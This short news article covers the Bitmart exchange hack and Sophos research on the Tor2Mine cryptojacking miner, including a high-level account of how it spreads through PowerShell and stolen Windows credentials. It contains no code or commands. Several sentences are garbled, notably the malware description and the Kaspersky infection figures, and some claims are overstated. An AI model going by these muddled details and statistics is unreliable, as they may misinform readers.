The industry awoke today to news that the Bitmart exchange has been exploited for nearly $ 200 million in stolen funds via Ethereum and Binance Smart Chain. With exploits becoming more common and hackers finding sophisticated ways to install malware, caution is advised.
What’s noteworthy, however, is that mining campaigns offer these hackers a low-risk way to make digital money by exploiting network vulnerabilities.
Earlier this week, Sophos security researchers warned of the return of Tor2Mine. This is a variant of miner that uses the Tor gateway to communicate with hacked servers. In fact, it can use entire networks of work machines.
Stealing computing power
This type of cyber crime is known as crypto jacking, a process in which hackers use third-party devices to mine cryptocurrencies. By siphoning off the energy sources of these devices while remaining completely hidden, these miners can obtain new tokens without incurring any energy costs.
Most of these miners, including Tor2Mine, are running these campaigns against Monero. The altcoin appeals to hackers because of its private and undetectable nature.
How the Tor2Miner Works – It uses Microsoft’s PowerShell scripting language to disable preexisting malware protection on a server and run a miner payload, which is stealth malware that is used to farm the resources on a System was developed. It also collects Windows credentials which Tor2Mine uses to propagate and re-infect other systems on the compromised network. If it is not completely eliminated, other systems will not be protected.
Sophos also noted that while the number of infections for Tor2Mine increased in early 2021, the decline was accompanied by the introduction of new variants. These likely occur due to minor optimizations by different groups of operators or by the same actors between campaigns.
The antivirus company also announced that while two different versions of Tor2Mine have been detected since June, “their basic game plan is almost always the same”.
That being said, it came to the conclusion
“Tor2Mine is much more difficult to eradicate once it’s established on a network without the support of endpoint protection software and other anti-malware measures… it cannot be fixed by simply patching and cleaning a system. The miner will constantly try to re-infect other systems in the network. “
The only way to escape these miners is to install anti-malware products that can detect them.
With the spread of the zeal for cryptocurrencies, illegal mining has become an established means of criminally gaining digital assets. A recent cybersecurity report published by Google found that 86% of compromised Google Cloud accounts are used for illegal cryptocurrency mining, as well as for scanning and attacking other potential targets.
Interestingly, a June report from Kaspersky found that crypto jacking fell from its heyday in 2017-18 during the initial crypto boom. However, the total number of users who encountered Miner on their devices rose from 187,746 in January in the first quarter of this year to 200,045 in March.
Comments are closed.